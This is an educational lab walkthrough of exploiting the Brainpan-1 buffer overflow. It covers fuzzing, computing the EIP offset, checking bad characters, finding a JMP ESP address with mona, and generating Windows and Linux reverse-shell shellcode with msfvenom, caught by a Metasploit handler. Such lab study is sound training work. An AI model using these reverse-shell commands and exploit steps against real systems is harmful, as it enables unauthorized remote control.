Introduction to Penetration Testing Notes

Note:

This article is only for technical discussion and research. All terminals and servers used in these notes are self-built lab environments for penetration testing. I will use Kali Linux as the attacker machine in this study. The techniques shown here are for educational purposes only; this site and the author are not responsible for their use for any other purpose.

I. Foreword

A buffer overflow occurs when, because of a programming flaw, a program writes input into a buffer without checking its size, so that more data than the buffer can hold is written past its end. This disrupts the program's execution, and whoever takes advantage of that disruption can gain control of the program and even of the system.

Project 17, Brainpan-1, is dedicated to testing buffer overflow knowledge. The target exposes only port 10000 as a web front end; after a simple directory brute-force, the file brainpan.exe can be found there. The target is an Ubuntu host with a Windows compatibility module installed to run the exe file, which starts a service listening on port 9999. The environment resembles a PWN challenge in an AWD competition. Several approaches will be used to explain what a buffer overflow is, how to detect it, how to exploit it, what the stack is, and so on.

Next, I would like to share one of these approaches; comments and advice are welcome.

Test for buffer overflow:

python brainfuzzer.py 192.168.4.96 9999


The script sends inputs of 1 to 1500 characters to the service; the program crashes, so there is a buffer overflow!

II. Windows buffer overflow

1. Open Immunity Debugger in Windows 10

Immunity Debugger is a debugging and vulnerability analysis tool; it can be downloaded from many sources found via Baidu.

Immunity Debugger reference: https://blog.csdn.net/clark3256453/article/details/121422527

To start the exploitation: click File > Open and select the program under c:/….

The interface after loading the program:

This is the initial interface when the program is opened; click the right-arrow (Run) icon to run the program:

Once the program is running, the EAX value is cleared to zero, the program runs normally, and port 9999 is opened!

2. Query the offset

1) Generate a 1000-character unique pattern using pattern_create.rb

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000

2) Modify the script brainpan1.py to send this pattern

3) Send the 1000 bytes to overflow the program

python brainpan1.py 10.211.55.44 9999

From Kali, attack the Windows service on port 9999 (host 10.211.55.44).

ESP is overwritten, and the EIP value is 35724134.

4) Look up the EIP offset

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134
[*] Exact match at offset 524

Offset 524!

5) How is this value derived?

First, note that the bytes in memory are stored in the reverse of the order we usually write them: on this little-endian architecture the lowest byte of a value sits at the lowest address, so the register value 35724134 appears in memory as:

35724134
34 41 72 35

Looking these bytes up in the ASCII table:

34 41 72 35
4  A  r  5
4Ar5

So the ASCII rendering of the value in EIP is 4Ar5.

pattern_offset.rb simply searches for where 4Ar5 occurs within the 1000-character pattern generated by pattern_create.rb, and that position, 524, is the number of bytes our input must fill before it reaches EIP!
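To make the arithmetic above concrete, here is a small Python reimplementation (added here; not part of the original write-up or of Metasploit) of what pattern_create.rb and pattern_offset.rb do: it builds the same Aa0Aa1Aa2... pattern, converts the EIP value shown by the debugger into its little-endian byte order, and looks those bytes up in the pattern. The function names are my own.

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def cyclic_pattern(length: int) -> bytes:
    """Same scheme as pattern_create.rb: triplets of uppercase letter,
    lowercase letter, digit (Aa0Aa1...Aa9Ab0...). Every 4-byte window
    is unique within the first 20280 bytes, so 4 bytes pin down an offset."""
    out = bytearray()
    for upper in UPPER:
        for lower in LOWER:
            for digit in DIGIT:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def eip_to_bytes(eip_hex: str) -> bytes:
    """Turn the EIP value as the debugger prints it ('35724134') into the
    little-endian byte order it had in memory, i.e. b'4Ar5'."""
    return struct.pack("<I", int(eip_hex, 16))


def pattern_offset(eip_hex: str, length: int = 1000) -> int:
    """Offset of the 4 bytes that landed in EIP within the sent pattern,
    which is what pattern_offset.rb -q reports. Returns -1 if not found."""
    return cyclic_pattern(length).find(eip_to_bytes(eip_hex))


if __name__ == "__main__":
    print(eip_to_bytes("35724134"))    # b'4Ar5'
    print(pattern_offset("35724134"))  # 524
```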

3. Check the size of the shellcode space

Writing the shellcode into the address space: the program reads the EIP register value, jumps to the shellcode and executes it. Next, find out how much memory space is available to hold the shellcode.


472 bytes of C are sent in this test!

python brainpan2.py 10.211.55.44 9999

EBP (the stack base pointer) has been overwritten by the 524 As, EIP holds the four Bs, and ESP points to the 472 C bytes.

Right-click ESP and select Follow in Dump.

Right-click in the lower-left view and select Hex > Hex/ASCII (16 bytes).

A 16-byte line display makes it easy to watch!

Available start address: 005FF910, end address: 005FFAE0

The difference, 1D0 in hexadecimal, is 464 in decimal.

The smallest shellcode needs about 300 bytes, and the available space is 464 bytes, which is enough to hold a shellcode!

4. Look for bad characters

Different programs, protocols and vulnerabilities treat certain characters as bad characters that have a fixed meaning:

1. The return address, the shellcode and the buffer must contain no bad characters.
2. The null byte (0x00) is the string terminator, which ends string copy operations.

For example, computers use ASCII encoding, where different codes represent different characters, one byte per character: 00000000 to 11111111 gives 256 possible characters.

Next, look for bad characters: rerun the program and send all possible byte values with the modified script (based on brainpan2):

python brainpan3.py 10.211.55.44 9999

Again, right-click ESP and select Follow in Dump.

After selecting the 16-byte display you can see that the rightmost column reads 1 9 F, meaning the bytes arrived in order and there are no bad characters!

Comparing byte by byte shows that, apart from 00, everything is intact! Next, find a value for the instruction pointer register that jumps to ESP!
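As an added example (my own code, not from the original post), the following Python builds the byte string sent in this step and compares it with the bytes read back from the debugger dump at ESP, reporting bytes that were replaced, dropped, or that cut the copy short. The dumps in the example are constructed to exercise each case; on brainpan the real comparison finds nothing besides the excluded 0x00.

```python
def badchar_string(exclude=(0x00,)) -> bytes:
    """Every byte value 0x00..0xff in order, minus the ones already known to be
    bad. The first pass leaves out 0x00, the string terminator, so the copy is
    not cut short before the remaining bytes can be checked."""
    return bytes(b for b in range(256) if b not in exclude)


def as_python_literal(data: bytes) -> str:
    """Render bytes the way the scripts embed them, e.g. '\\x01\\x02...'."""
    return "".join("\\x%02x" % b for b in data)


def find_bad_chars(sent: bytes, dumped: bytes) -> list:
    """Walk the sent bytes alongside the bytes seen in the dump. A byte is
    reported as bad if it was replaced in place, dropped (the dump continues
    with the following byte), or if the copy stopped right at that byte."""
    bad = []
    i = j = 0
    while i < len(sent):
        if j >= len(dumped):
            bad.append(sent[i])   # copy ended early: this byte never landed
            break
        if dumped[j] == sent[i]:
            i += 1
            j += 1                # byte survived intact
            continue
        bad.append(sent[i])
        if i + 1 < len(sent) and dumped[j] == sent[i + 1]:
            i += 1                # dropped: dump already shows the next byte
        else:
            i += 1
            j += 1                # replaced in place: skip the mangled byte
    return bad


if __name__ == "__main__":
    sent = badchar_string()
    print(as_python_literal(sent)[:32], "...")
    # Constructed dumps (not captured from brainpan) covering each case.
    cases = [("intact", sent),
             ("0x0a dropped", sent.replace(b"\x0a", b"")),
             ("cut at 0x0d", sent[:sent.index(0x0d)])]
    for name, dump in cases:
        print(name, [hex(b) for b in find_bad_chars(sent, dump)])
```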

5. Exploit development

Redirect the data flow:

1. Replace the EIP value with the ESP address.
2. However, the ESP address changes between runs, so hard-coding it is not feasible.

Workarounds:

1. Look for a system module loaded at a fixed address in memory.
2. Look for a JMP ESP instruction inside that module; jumping to its address lands indirectly on ESP, where the shellcode then executes.
3. Use mona.py to identify the memory modules; the "return address" to search for is the address of the JMP ESP instruction in the module.
4. Find that memory address.
5. The memory address must not contain bad characters, and the module must have no DEP or ASLR protection.

!mona modules

SafeSEH, ASLR and NXCompat are the memory protection mechanisms that a module may be protected by!

Now look inside the module for the JMP ESP instruction! The module line is: brainpan.exe 0BADF00D

Finding JMP ESP: use nasm_shell.rb to get the opcode bytes for JMP ESP!

locate nasm_shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
00000000  FFE4              jmp esp

You can see the JMP ESP opcode: \xff\xe4

First, we need to find the EIP offset, i.e. the exact number of bytes that reach EIP, so that we can overwrite the EIP register precisely. This means knowing which four As land in the EIP register, which is tedious to work out by hand. Of course there is an easier way: here we use the Immunity Debugger plugin Mona, which avoids the usual laborious search.

Mona installation:

Put mona.py into the PyCommands folder of the Immunity Debugger install directory!

!mona find -s "\xff\xe4" -m brainpan.exe

This gives the JMP ESP address 0x311712F3.

Shellcode generation:

msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.2.157 -e x86/shikata_ga_nai -b "\x00" -f py

Generate the shellcode and put it into the script!

Brainpan4:

Place the shellcode at the end of the buffer!

Windows 10: open brainpan.exe:

Kali: run the script:

Shell obtained:

To do the same for the Linux target, generate Linux reverse-shell shellcode: brainpan5

msfvenom -p linux/x86/shell_reverse_tcp LPORT=443 LHOST=192.168.2.157 -e x86/shikata_ga_nai -b "\x00" -f py

Then replace the shellcode in the script:

After replacement, execute:

msfconsole
use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set lport 443
set lhost 192.168.2.157
exploit -j

MSF successfully receives the reverse shell!

III. Summary

Today I learned how to use the Immunity Debugger reverse analysis tool for a Windows 10 buffer overflow: how to find the stack space, how to check for bad characters, how to write the exploit, and finally how to control the server through remote code execution. I learned a lot of tips and tricks. I hope readers can try the operation themselves! Also, report the vulnerability to the affected organization so that it can be fixed as soon as possible!

We hope everyone can raise their security awareness: without network security there is no national security!

That is all for today's foundation work; although basic, it must be kept in mind.